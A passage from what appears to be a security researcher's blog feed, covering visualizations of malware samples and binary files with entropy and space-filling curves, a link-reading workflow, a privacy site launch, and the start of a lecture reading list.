class="charclass" src='small_1b0e377994cfdb4eec0d2fb028118844_charclass.png'/> </a> </td> <td> <a href="0b4f82e83741e79310d797d54db5a9be.html"> <img class="entropy" src='small_0b4f82e83741e79310d797d54db5a9be_entropy.png'/> <img class="charclass" src='small_0b4f82e83741e79310d797d54db5a9be_charclass.png'/> </a> </td> <td> <a href="14e6950dd4bcffe54bf158a20437e6b4.html"> <img class="entropy" src='small_14e6950dd4bcffe54bf158a20437e6b4_entropy.png'/> <img class="charclass" src='small_14e6950dd4bcffe54bf158a20437e6b4_charclass.png'/> </a> </td> <td> <a href="1998bb714c0de980635ee9b8c1951381.html"> <img class="entropy" src='small_1998bb714c0de980635ee9b8c1951381_entropy.png'/> <img class="charclass" src='small_1998bb714c0de980635ee9b8c1951381_charclass.png'/> </a> </td> <td> <a href="023293a96c763bbdee3991994cdcdcef.html"> <img class="entropy" src='small_023293a96c763bbdee3991994cdcdcef_entropy.png'/> <img class="charclass" src='small_023293a96c763bbdee3991994cdcdcef_charclass.png'/> </a> </td> </tr><tr> <td> <a href="14064e26cbd3daed7e6eb3b4fb245c8f.html"> <img class="entropy" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_entropy.png'/> <img class="charclass" src='small_14064e26cbd3daed7e6eb3b4fb245c8f_charclass.png'/> </a> </td> <td> <a href="1511f2d75e07bb94f5da8cbc031a51dd.html"> <img class="entropy" src='small_1511f2d75e07bb94f5da8cbc031a51dd_entropy.png'/> <img class="charclass" src='small_1511f2d75e07bb94f5da8cbc031a51dd_charclass.png'/> </a> </td> <td> <a href="14560f7dc19e6fef87743f83e5234519.html"> <img class="entropy" src='small_14560f7dc19e6fef87743f83e5234519_entropy.png'/> <img class="charclass" src='small_14560f7dc19e6fef87743f83e5234519_charclass.png'/> </a> </td> <td> <a href="00f29767bee5f8bd5b2d55d5be734f69.html"> <img class="entropy" src='small_00f29767bee5f8bd5b2d55d5be734f69_entropy.png'/> <img class="charclass" src='small_00f29767bee5f8bd5b2d55d5be734f69_charclass.png'/> </a> </td> <td> <a href="05fd535d70dfb5ee4f36e87e39d8c70d.html"> <img class="entropy" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_entropy.png'/> <img class="charclass" src='small_05fd535d70dfb5ee4f36e87e39d8c70d_charclass.png'/> </a> </td> </tr><tr> <td> <a href="109f8c72ff91dee5906aba0e47324526.html"> <img class="entropy" src='small_109f8c72ff91dee5906aba0e47324526_entropy.png'/> <img class="charclass" src='small_109f8c72ff91dee5906aba0e47324526_charclass.png'/> </a> </td> <td> <a href="1aa40b6ea4e7be64d4e6a024fcdf76fe.html"> <img class="entropy" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_entropy.png'/> <img class="charclass" src='small_1aa40b6ea4e7be64d4e6a024fcdf76fe_charclass.png'/> </a> </td> <td> <a href="1a3aa70d060be5e6e778e3519b400bf1.html"> <img class="entropy" src='small_1a3aa70d060be5e6e778e3519b400bf1_entropy.png'/> <img class="charclass" src='small_1a3aa70d060be5e6e778e3519b400bf1_charclass.png'/> </a> </td> <td> <a href="08b983ec55bfd50d1d2cb9a90b1ae54e.html"> <img class="entropy" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_entropy.png'/> <img class="charclass" src='small_08b983ec55bfd50d1d2cb9a90b1ae54e_charclass.png'/> </a> </td> <td> <a href="04240e137999dc6b5115de8db3a15f53.html"> <img class="entropy" src='small_04240e137999dc6b5115de8db3a15f53_entropy.png'/> <img class="charclass" src='small_04240e137999dc6b5115de8db3a15f53_charclass.png'/> </a> </td> </tr><tr> <td> <a href="08c926bf7fbb3397236effef1b30b4df.html"> <img class="entropy" src='small_08c926bf7fbb3397236effef1b30b4df_entropy.png'/> <img class="charclass" src='small_08c926bf7fbb3397236effef1b30b4df_charclass.png'/> </a> </td> <td> <a href="09dd27fcccb9c000d37c6394364be1b5.html"> <img class="entropy" src='small_09dd27fcccb9c000d37c6394364be1b5_entropy.png'/> <img class="charclass" src='small_09dd27fcccb9c000d37c6394364be1b5_charclass.png'/> </a> </td> <td> <a href="0bcee1314e8c61fa8ef55743f3bb7742.html"> <img class="entropy" src='small_0bcee1314e8c61fa8ef55743f3bb7742_entropy.png'/> <img class="charclass" src='small_0bcee1314e8c61fa8ef55743f3bb7742_charclass.png'/> </a> </td> <td> <a href="0e2bf707dbc146c9d60c373237d050b7.html"> <img class="entropy" src='small_0e2bf707dbc146c9d60c373237d050b7_entropy.png'/> <img class="charclass" src='small_0e2bf707dbc146c9d60c373237d050b7_charclass.png'/> </a> </td> <td> <a href="0309fc0e6dbeb714c5361f82b2ccb037.html"> <img class="entropy" src='small_0309fc0e6dbeb714c5361f82b2ccb037_entropy.png'/> <img class="charclass" src='small_0309fc0e6dbeb714c5361f82b2ccb037_charclass.png'/> </a> </td> </tr><tr> <td> <a href="0ff25e3cefcce4336d0abeb9f02ccb02.html"> <img class="entropy" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_entropy.png'/> <img class="charclass" src='small_0ff25e3cefcce4336d0abeb9f02ccb02_charclass.png'/> </a> </td> <td> <a href="19bc481e5cb1113c7eff49b67273f892.html"> <img class="entropy" src='small_19bc481e5cb1113c7eff49b67273f892_entropy.png'/> <img class="charclass" src='small_19bc481e5cb1113c7eff49b67273f892_charclass.png'/> </a> </td> <td> <a href="1a8700c754f97c115fa91fa161fa05cc.html"> <img class="entropy" src='small_1a8700c754f97c115fa91fa161fa05cc_entropy.png'/> <img class="charclass" src='small_1a8700c754f97c115fa91fa161fa05cc_charclass.png'/> </a> </td> <td> <a href="12e9e61357be212f28ea4c81ef75018d.html"> <img class="entropy" src='small_12e9e61357be212f28ea4c81ef75018d_entropy.png'/> <img class="charclass" src='small_12e9e61357be212f28ea4c81ef75018d_charclass.png'/> </a> </td> <td> <a href="01310712a180d9f939c126712d24363d.html"> <img class="entropy" src='small_01310712a180d9f939c126712d24363d_entropy.png'/> <img class="charclass" src='small_01310712a180d9f939c126712d24363d_charclass.png'/> </a> </td> </tr><tr> <td> <a href="1542a2f2732bbdad500bf112686503ac.html"> <img class="entropy" src='small_1542a2f2732bbdad500bf112686503ac_entropy.png'/> <img class="charclass" src='small_1542a2f2732bbdad500bf112686503ac_charclass.png'/> </a> </td> <td> <a href="096381c0f5ddc29319ba2b2647cea116.html"> <img class="entropy" src='small_096381c0f5ddc29319ba2b2647cea116_entropy.png'/> <img class="charclass" src='small_096381c0f5ddc29319ba2b2647cea116_charclass.png'/> </a> </td> <td> <a href="17fd97da6d93430ec0d9aa040b4b2c58.html"> <img class="entropy" src='small_17fd97da6d93430ec0d9aa040b4b2c58_entropy.png'/> <img class="charclass" src='small_17fd97da6d93430ec0d9aa040b4b2c58_charclass.png'/> </a> </td> <td> <a href="0d9109ab6b06f38221b713eb6a54c42f.html"> <img class="entropy" src='small_0d9109ab6b06f38221b713eb6a54c42f_entropy.png'/> <img class="charclass" src='small_0d9109ab6b06f38221b713eb6a54c42f_charclass.png'/> </a> </td> <td> <a href="18ce863d41622cd7aaa3c7d3d11e2f3e.html"> <img class="entropy" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_entropy.png'/> <img class="charclass" src='small_18ce863d41622cd7aaa3c7d3d11e2f3e_charclass.png'/> </a> </td> </tr><tr> <td> <a href="0f5c70c82a74c8ff3d05fbf4d90bc5bf.html"> <img class="entropy" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_entropy.png'/> <img class="charclass" src='small_0f5c70c82a74c8ff3d05fbf4d90bc5bf_charclass.png'/> </a> </td> <td> <a href="0fc12afe2d283b92184897b6e7bcc2c2.html"> <img class="entropy" src='small_0fc12afe2d283b92184897b6e7bcc2c2_entropy.png'/> <img class="charclass" src='small_0fc12afe2d283b92184897b6e7bcc2c2_charclass.png'/> </a> </td> <td> <a href="12eec9b3e0aa2e6683487c13eede2382.html"> <img class="entropy" src='small_12eec9b3e0aa2e6683487c13eede2382_entropy.png'/> <img class="charclass" src='small_12eec9b3e0aa2e6683487c13eede2382_charclass.png'/> </a> </td> <td> <a href="0d97f71367f8b6dcb8cbc8ec964ebdbe.html"> <img class="entropy" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_entropy.png'/> <img class="charclass" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_charclass.png'/> </a> </td> <td> <a href="18f9ede7d921742f963a0eb06887fdfa.html"> <img class="entropy" src='small_18f9ede7d921742f963a0eb06887fdfa_entropy.png'/> <img class="charclass" src='small_18f9ede7d921742f963a0eb06887fdfa_charclass.png'/> </a> </td> </tr><tr> <td> <a href="16c533cc9b3dac1bde9885b4bd967bff.html"> <img class="entropy" src='small_16c533cc9b3dac1bde9885b4bd967bff_entropy.png'/> <img class="charclass" src='small_16c533cc9b3dac1bde9885b4bd967bff_charclass.png'/> </a> </td> <td> <a href="0eab36fc4307a1fd3ad8d832c526cf40.html"> <img class="entropy" src='small_0eab36fc4307a1fd3ad8d832c526cf40_entropy.png'/> <img class="charclass" src='small_0eab36fc4307a1fd3ad8d832c526cf40_charclass.png'/> </a> </td> <td> <a href="17fa099ecef82edd1e4ddc61be575ae4.html"> <img class="entropy" src='small_17fa099ecef82edd1e4ddc61be575ae4_entropy.png'/> <img class="charclass" src='small_17fa099ecef82edd1e4ddc61be575ae4_charclass.png'/> </a> </td> <td> <a href="07ddb50c4cc358fc3718847684ca5fae.html"> <img class="entropy" src='small_07ddb50c4cc358fc3718847684ca5fae_entropy.png'/> <img class="charclass" src='small_07ddb50c4cc358fc3718847684ca5fae_charclass.png'/> </a> </td> <td> <a href="04fee7e6dedf912b4a72886486627b05.html"> <img class="entropy" src='small_04fee7e6dedf912b4a72886486627b05_entropy.png'/> <img class="charclass" src='small_04fee7e6dedf912b4a72886486627b05_charclass.png'/> </a> </td> </tr> </table> <p>Clicking will show you high-detail versions of both visualizations, and let you look up the binary hash to see what it is. I've used a square Hilbert curve layout - the files start in the top-left corner, and pass through the quadrants clockwise.</p> <p>I spent hours looking through thousands these visualizations today. I find them eerie and rather beautiful - an entirely different perspective from my day-to-day interactions with malware.</p> Visualizing entropy in binary files 2012-01-04T00:00:00+00:00 2012-01-04T00:00:00+00:00 https://corte.si/posts/visualisation/entropy/ <p><b>Edit: Since this post, I've created an interactive tool for binary visualisation - see it at <a rel="external" href="http://binvis.io">binvis.io</a></b></p> <p>Last week, I wrote about <a href="https://corte.si/posts/visualisation/binvis/">visualizing binary files using space-filling curves</a>, a technique I use when I need to get a quick overview of the broad structure of a file. Today, I'll show you an elaboration of the same basic idea - still based on space-filling curves, but this time using a colour function that measures local entropy.</p> <p>Before I get to the details, let's quickly talk about the motivation for a visualization like this. We can think of entropy as the degree to which a chunk of data is disordered. If we have a data set where all the elements have the same value, the amount of disorder is nil, and the entropy is zero. If the data set has the maximum amount of heterogeneity (i.e. all possible symbols are represented equally), then we also have the maximum amount of disorder, and thus the maximum amount of entropy. There are two common types of high-entropy data that are of special interest to reverse engineers and penetration testers. The first is compressed data - finding and extracting compressed sections is a common task in many security audits. The second is cryptographic material - which is obviously at the heart of most security work. Here, I'm referring not only to key material and certificates, but also to hashes and actual encrypted data. As I show below, a tool like the one I'm describing today can be highly useful in spotting this type of information.</p> <p>For this visualization, I use the <a rel="external" href="http://en.wikipedia.org/wiki/Entropy_(information_theory)">Shannon entropy</a> measure to calculate byte entropy over a sliding window. This gives us a "local entropy" value for each byte, even though the concept doesn't really apply to single symbols.</p> <p>With that out of the way, let's look at some pretty pictures.</p> <h2 id="visualizing-the-osx-ksh-binary">Visualizing the OSX ksh binary</h2> <p>In my previous post, I used the <a rel="external" href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a> binary as a guinea pig, and I'll do the same here. On the left is the entropy visualization with colours ranging from black for zero entropy, through shades of blue as entropy increases, to hot pink for maximum entropy. On the right is the Hilbert curve visualization from the last post for comparison - see <a href="https://corte.si/posts/visualisation/binvis/">the post itself</a> for an explanation of the colour scheme. Click for larger versions with much more detail:</p> <div class="media"> <a href="hilbert-entropy-large.png"> <img src="hilbert-entropy.png" /> </a> <div class="subtitle"> entropy </div> </div><div class="media"> <a href="..&#x2F;binvis&#x2F;binary-large-hilbert.png"> <img src="..&#x2F;binvis&#x2F;binary-hilbert.png" /> </a> <div class="subtitle"> byte class </div> </div> <p>Note that this is a dual-architecture <a rel="external" href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a> file, containing code for both i386 and x86_64. You can see this if you squint somewhat at these images - some broad structures in the file are repeated twice. We can see that there are a number of different sections of the <strong>ksh</strong> binary that have very high entropy. It's not immediately obvious why a system binary would contain either compressed sections or cryptographic material. As it happens, the explanation in this case is quite interesting. Let's have a closer look:</p> <div class="media"> <a href="entropy-annotated.png"> <img src="entropy-annotated.png" /> </a> </div> <p>Sections <strong>1</strong> and <strong>2</strong> are a lovely validation of the central idea of this post. These two areas do indeed contain cryptographic material - in this case, <a rel="external" href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">code signing hashes and certificates</a>. Rather satisfyingly, they stand out like a sore thumb. It turns out that all of the official OSX binaries are signed by Apple. This is then used in turn to apply <a rel="external" href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">a variety of policies</a>, depending on who the signatory is, and whether they are trusted.</p> <p>You can dump some rudimentary data about a binary's signature using the <strong>codesign</strong> command (which you can also use to sign binaries yourself):</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>&gt; codesign -dvv /bin/ksh</span></span> <span class="giallo-l"><span>Executable=/bin/ksh</span></span> <span class="giallo-l"><span>Identifier=com.apple.ksh</span></span> <span class="giallo-l"><span>Format=Mach-O universal (i386 x86_64)</span></span> <span class="giallo-l"><span>CodeDirectory v=20100 size=5662 flags=0x0(none) hashes=278+2 location=embedded</span></span> <span class="giallo-l"><span>Signature size=4064</span></span> <span class="giallo-l"><span>Authority=Software Signing</span></span> <span class="giallo-l"><span>Authority=Apple Code Signing Certification Authority</span></span> <span class="giallo-l"><span>Authority=Apple Root CA</span></span> <span class="giallo-l"><span>Info.plist=not bound</span></span> <span class="giallo-l"><span>Sealed Resources=none</span></span> <span class="giallo-l"><span>Internal requirements count=1 size=92</span></span></code></pre> <p>Section <strong>3</strong> (the two occurrences are the same data repeated for each architecture) is interesting for a different reason - it's a cautionary example of how the simple entropy measure we're using sometimes detects high entropy in highly structured data. A hex dump of the start of the region looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>000d1f00 00 01 00 00 00 02 00 00 00 06 00 00 00 00 00 00 |................|</span></span> <span class="giallo-l"><span>000d1f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|</span></span> <span class="giallo-l"><span>000d1f20 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................|</span></span> <span class="giallo-l"><span>000d1f30 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f |................|</span></span> <span class="giallo-l"><span>000d1f40 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f | !&quot;#$%&amp;&#39;()*+,-./|</span></span> <span class="giallo-l"><span>000d1f50 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f |0123456789:;&lt;=&gt;?|</span></span> <span class="giallo-l"><span>000d1f60 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f |@ABCDEFGHIJKLMNO|</span></span> <span class="giallo-l"><span>000d1f70 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f |PQRSTUVWXYZ[\]^_|</span></span> <span class="giallo-l"><span>000d1f80 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f |`abcdefghijklmno|</span></span> <span class="giallo-l"><span>000d1f90 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f |pqrstuvwxyz{|}~.|</span></span> <span class="giallo-l"><span>000d1fa0 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f |................|</span></span> <span class="giallo-l"><span>000d1fb0 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f |................|</span></span> <span class="giallo-l"><span>000d1fc0 a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af |................|</span></span> <span class="giallo-l"><span>000d1fd0 b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf |................|</span></span> <span class="giallo-l"><span>000d1fe0 c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf |................|</span></span> <span class="giallo-l"><span>000d1ff0 d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df |................|</span></span> <span class="giallo-l"><span>000d2000 e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef |................|</span></span> <span class="giallo-l"><span>000d2010 f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff |................|</span></span></code></pre> <p>We see that this section contains each byte value from 0x00 to 0xff in order - furthermore this whole block is repeated with minor variations a number of times. There are two things to explain here - why is this detected as "high entropy" data, and what the heck is it doing in the file?</p> <p>First, we need to understand that the Shannon entropy measure looks only at the relative occurrence frequencies of individual symbols (in this case, bytes). A chunk of data like the one above therefore looks like it has high entropy, because each symbol occurs once and only once, making the data highly heterogeneous.</p> <p>Now, what earthly use would chunks of data like this be? With a bit of digging, I found the answer in the <strong>ksh</strong> source code. These sections are maps used for translation between various <a rel="external" href="http://en.wikipedia.org/wiki/EBCDIC">character</a> <a rel="external" href="http://en.wikipedia.org/wiki/ASCII">encodings</a>. If you're interested, here's the <a rel="external" href="http://opensource.apple.com/source/ksh/ksh-13/ksh/src/lib/libast/string/ccmap.c">culprit in all its repetitive glory</a>.</p> <h2 id="the-code">The code</h2> <p>As usual, the code for generating all of the images in this post is up on GitHub. The entropy visualizations were created with <a rel="external" href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, a new addition to <a rel="external" href="https://github.com/cortesi/scurve">scurve</a>, my compendium of code related to space-filling curves.</p> A personal link mill 2011-12-30T00:00:00+00:00 2011-12-30T00:00:00+00:00 https://corte.si/posts/socialmedia/linkmill/ <p>I posted a link to an interesting visualization paper on Twitter today, <a rel="external" href="https://twitter.com/#!/__mharrison__/status/152503684822081537">prompting someone to ask me where I had found it</a>. Sadly, I had to admit that I had no clue where I first saw it referenced, due to the way I consume links I find on the net. So, I thought I'd write a quick blog post to explain myself, and then pitch a product idea that could make my life (and maybe yours) much easier.</p> <p>First, the problem statement: my aim is to efficiently discover links to interesting stuff on the net. Simple as that. A few years ago, my flow of links came mostly from social news sites (<a rel="external" href="http://news.ycombinator.com">Hacker News</a> and <a rel="external" href="http://reddit.com">Reddit</a>), and items shared by people I follow on social networks. Over time, I became more and more disenchanted with this way of doing things. The social news approach is to take a torrent of very low quality links (user submissions), and then crowd-source the filtration process through voting. But popularity is not a good measure of information quality, and the result is a bland, lowest-common-denominator view of the world that has no room for anything that doesn't make it to the front page. Don't get me wrong - Reddit and HN do a lot of other things well - but they just don't cut it as primary information sources. Mining links from social networks is a more promising approach, but still problematic. None of the social networks provide the tools needed to extract shared links from the update stream and consume them efficiently. There is also a structural issue - I don't necessarily want to mix my social ties and my information sources, and I definitely don't want to be limited to just one platform. These are separate functions that I feel require separate tools.</p> <h2 id="my-personal-link-mill">My personal link mill</h2> <p>Eventually, I took matters into my own hands. First, I hugely broadened the number of information sources I consumed. The tool I use for this is Google Reader - I now subscribe to about 800 individual feeds, and this number is growing daily. The trick here is to find high-quality, low-volume link sources. The motherlode of good links for me was to be found on social bookmarking sites. About 700 of my subscriptions are to the RSS feeds of individual users on <a rel="external" href="http://pinboard.in">Pinboard</a> and <a rel="external" href="http://delicious.com">Delicious</a>. This gives me very fine control and a great mix of interests. Plus, getting links from individual curators handily sidesteps the social news group-think problem. The remainder of my subscriptions are split between blogs, some sub-Reddits, a few Twitter users and subsections of <a rel="external" href="http://arxiv.org">arXiv</a>.</p> <p>So much for how my intake works. Just as important is the way that I consume it. I do my "filtering" in batches, usually in the evening. Using <a rel="external" href="http://reederapp.com/">Reeder</a> on my iPad works well for me, letting me flick #quickly and comfortably through all the new links of the day. When I find something that looks interesting, I resist the temptation to read it then and there - instead, I batch up all my reading for later. If it's a web page, it goes to <a rel="external" href="http://www.instapaper.com/">Instapaper</a>. If it's a PDF, it gets downloaded into a <a rel="external" href="http://www.dropbox.com/">DropBox</a> folder, which is synced to <a rel="external" href="http://www.goodiware.com/goodreader.html">GoodReader</a>.</p> <p>Finally, the actual reading. Every morning, I toddle off to a nice cafe with my iPad, and read all the interesting stuff I saved the previous day in a single sitting. I'm ruthless about just skimming things that don't warrant careful attention. If I find something particularly interesting I save it permanently, and perhaps tweet it or mail it to someone I think might be interested.</p> <h2 id="problems-and-a-product-idea">Problems - and a product idea?</h2> <p>This system works for me, but it has many problems. There's no end-to-end coordination, so by the time I sit down to actually read something, I have no easy way to tell which feed it came from. Google Reader sucks at managing hundreds of low-volume subscriptions. Reeder is a great, but is not tailored to consuming redundant information from many sources. The end result is that maintaining the system I have is a time-consuming pain in the ass. The fact that it's still worth it despite this, makes me think there might be commercial room for a better solution.</p> <p>Which brings me to a rough product idea - a formalized version of this link mill for people who want to take direct control of their information intake. The business end is a generalized feed consumer, letting you subscribe to RSS feeds, Twitter users, Google+ updates, sub-Reddits and other information sources. Links are extracted from these feeds, keeping track of which links appeared where. The user is then presented with a stream of links to consume, de-duplicated so that those appearing in multiple feeds are presented only once. The system keeps track of links the user marks as "interesting", batching them for later consumption. It also uses this information to score the feeds, letting the user see which feeds are low quality, and should be ditched. Given the right tools, the time needed for a user to maintain and tend their link feed garden would be quite modest, and the rewards would be great.</p> <p>If someone built this, I for one would gladly fork over some of my hard-earned doubloons to use it. In fact, with some validation of the idea and a few collaborators I might think of building it myself. Does this sound useful to anyone else?</p> Visualizing binaries with space-filling curves 2011-12-23T00:00:00+00:00 2011-12-23T00:00:00+00:00 https://corte.si/posts/visualisation/binvis/ <p><b>Edit: Since this post, I've created an interactive tool for binary visualisation - see it at <a rel="external" href="http://binvis.io">binvis.io</a></b></p> <p>In my day job I often come across binary files with unknown content. I have a set of standard avenues of attack when I confront such a beast - use "file" to see if it's a known file type, "strings" to see if there's readable text, run some in-house code to extract compressed sections, and, of course, fire up a hex editor to take a direct look. There's something missing in that list, though - I have no way to get a quick view of the overall structure of the file. Using a hex editor for this is not much chop - if the first section of the file looks random (i.e. probably compressed or encrypted), who's to say that there isn't a chunk of non-random information a meg further down? Ideally, we want to do this type of broad pattern-finding by eye, so a visualization seems to be in order.</p> <p>First, lets begin by picking a colour scheme. We have 256 different byte values, but for a first-pass look at a file, we can compress that down into a few common classes:</p> <table> <tr> <td style="background-color: #000000">&nbsp;</td> <td>0x00</td> </tr> <tr> <td style="background-color: #ffffff">&nbsp;</td> <td>0xFF</td> </tr> <tr> <td style="background-color: #377eb8">&nbsp;</td> <td>Printable characters</td> </tr> <tr> <td style="background-color: #e41a1c">&nbsp;</td> <td>Everything else</td> </tr> </table> <p>This covers the most common padding bytes, nicely highlights strings, and lumps everything else into a miscellaneous bucket. The broad outline of what we need to do next is clear - we sample the file at regular intervals, translate each sampled byte to a colour, and write the corresponding pixel to our image. This brings us to the big question - what's the best way to arrange the pixels? A first stab might be to lay the pixels out row by row, snaking to and fro to make sure each pixel is always adjacent to its predecessor. It turns out, however, that this zig-zag pattern is not very satisfying - small scale features (i.e. features that take up only a few lines) tend to get lost. What we want is a layout that maps our one-dimensional sequence of samples onto the 2-d image, while keeping elements that are close together in one dimension as near as possible to each other in two dimensions. This is called "locality preservation", and the <a rel="external" href="http://en.wikipedia.org/wiki/Space-filling_curve">space-filling curves</a> are a family of mathematical constructs that have precisely this property. If you're a regular reader of this blog, you may know that I have an <a href="https://corte.si/posts/code/hilbert/portrait/">almost</a> <a href="https://corte.si/posts/code/sortvis-fruitsalad/">unseemly</a> <a href="https://corte.si/posts/code/hilbert/swatches/">fondness</a> for these critters. So, lets add a couple of space-filling curves to the mix to see how they stack up. The <a rel="external" href="http://en.wikipedia.org/wiki/Z-order_curve">Z-Order curve</a> has found wide practical use in computer science. It's not the best in terms of locality preservation, but it's easy and quick to compute. The <a rel="external" href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert curve</a>, on the other hand, is (nearly) as good as it gets at locality preservation, but is much more complicated to generate. Here's what our three candidate curves look like - in each case, the traversal starts in the top-left corner:</p> <div class="container"> <div class="row"> <div class="column"> <img src="zigzag.png"/> <h4>Zigzag</h4> </div> <div class="column"> <img src="zorder.png"/> <h4>Z-order</h4> </div> <div class="column"> <img src="hilbert.png"/> <h4>Hilbert</h4> </div> </div> </div> <p>And here they are, visualizing the <a rel="external" href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a> (<a rel="external" href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a>, <a rel="external" href="http://en.wikipedia.org/wiki/Fat_binary">dual-architecture</a>) binary distributed with OSX - click for the significantly more spectacular larger versions of the images:</p> <div class="container"> <div class="row"> <div class="column"> <a href="binary-large-zigzag.png"><img src="binary-zigzag.png"/></a> <h4>Zigzag</h4> </div> <div class="column"> <a href="binary-large-zorder.png"><img src="binary-zorder.png"/></a> <h4>Z-order</h4> </div> <div class="column"> <a href="binary-large-hilbert.png"><img src="binary-hilbert.png"/></a> <h4>Hilbert</h4> </div> </div> </div> <p>The classical Hilbert and Z-Order curves are actually square, so for these visualizations I've unrolled them, stacking four sub-curves on top of each other. To my eye, the Hilbert curve is the clear winner here. Local features are prominent because they are nicely clumped together. The Z-order curve shows some annoying artifacts with contiguous chunks of data sometimes split between two or more visual blocks.</p> <p>The downside of the space-filling curve visualizations is that we can't look at a feature in the image and tell where, exactly, it can be found in the file. I'm toying with the idea (though not very seriously) of writing an interactive binary file viewer with a space-filling curve navigation pane. This would let the user click on or hover over a patch of structure and see the file offset and the corresponding hex.</p> <h2 id="more-detail">More detail</h2> <p>We can get more detail in these images by increasing the granularity of the colour mapping. One way to do this is to use a trick I first concocted to <a href="https://corte.si/posts/code/hilbert/portrait/">visualize the Hilbert Curve at scale</a>. The basic idea is to use a 3-d Hilbert curve traversal of the RGB colour cube to create a palette of colours. This makes use of the locality-preserving properties of the Hilbert curve to make sure that similar elements have similar colours in the visualization. See the <a href="https://corte.si/posts/code/hilbert/portrait/">original post</a> for more.</p> <p>So, here's a Hilbert curve mapping of a binary file, using a Hilbert-order traversal of the RGB cube as a colour palette. Again, click on the image for the much nicer large scale version:</p> <div class="media"> <a href="hilbert-hilbert-large.png"> <img src="hilbert-hilbert.png" /> </a> </div> <p>This shows significantly more fine-grained structure, which might be good for a deep dive into a binary. On the other hand, the colours don't map cleanly to distinct byte classes, so the image is harder to interpret. An ideal hex viewer would let you flick between the two palettes for navigation.</p> <h2 id="the-code">The code</h2> <p>As usual, I'm publishing the code for generating all of the images in this post. The binary visualizations were created with <a rel="external" href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, which is a new addition to <a rel="external" href="https://github.com/cortesi/scurve">scurve</a>, my space-filling curve project. The curve diagrams were made with the "drawcurve" utility to be found in the same place.</p> netograph.com - Realtime privacy snapshots of the social web 2011-12-08T00:00:00+00:00 2011-12-08T00:00:00+00:00 https://corte.si/posts/netograph/launch/ <p>Today, I'm launching <a rel="external" href="http://netograph.com">Netograph</a>, a new privacy-related site that I've been hacking on over the past few months. The goal of the project is to provide you with a quick overview of the privacy picture for a URL, <strong>before</strong> you've clicked on the link. At the moment, Netograph scans <a rel="external" href="http://reddit.com">Reddit</a>, <a rel="external" href="http://news.ycombinator.com">Hacker News</a>, <a rel="external" href="http://pinboard.in">Pinboard</a>, <a rel="external" href="http://delicous.com">Delicous</a> and <a rel="external" href="http://digg.com">Digg</a> - links on these sites should show up within a few minutes of submission.</p> <p>For more details, head over to <a rel="external" href="http://netograph.com">netograph.com</a>. There you will also find <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/netograph/">Firefox</a> and <a rel="external" href="https://chrome.google.com/webstore/detail/bfhmbldbigkpniinkmckafbgcajcbaai">Chrome</a> browser addons that let you view the Netograph report for a URL instantly with a right-click. Enjoy!</p> <div class="container"> <div class="row"> <div class="column"> <a href="http://netograph.com/starmap/1740"> <img src="ng-guardian.png"> guardian.co.uk </a> </div> <div class="column"> <a href="http://netograph.com/starmap/2512"> <img src="ng-techcrunch.png"> techcrunch.com </a> </div> <div class="column"> <a href="http://netograph.com/starmap/2457"> <img src="ng-reddit.png"> reddit.com </a> </div> </div> </div> <h2 id="what-s-next">What's next?</h2> <p>This is just the first step. As I hinted in a <a href="https://corte.si/posts/privacy/neighbourhoods-of-trust/">previous post</a>, the most interesting results from Netograph are likely to come from aggregating and cross-correlating the data for individual URLs. I'm already hard at work on this - the next iteration of Netograph will aim to shine some light on the sometimes shadowy network of third-parties that track and analyze nearly every URL we visit. I will also be publishing some interesting tidbits from this data corpus on my blog as I go along, so watch this space.</p> Otago Polytechnic Talk 2011-10-31T00:00:00+00:00 2011-10-31T00:00:00+00:00 https://corte.si/posts/talks/polytech/ <p>Further reading for the guest lecture I'm giving at Otago Polytechnic today:</p> <ul> <li>The talk I'm not giving: <a rel="external" href="https://www.owasp.org/index.php/Top_10_2010-Main">OWASP Top 10</a></li> <li>Tools: <a rel="external" href="http://getfirebug.com/">FireBug</a>, <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">TamperData</a>, <a rel="external" href="http://python.org">Python</a>.</li> <li>The <a href="http://en.wikipedia.org/wiki/Samy_(XSS)">Myspace Worm</a>, and Samy Kamkar's <a rel="external" href="http://namb.la/popular/tech.html">own 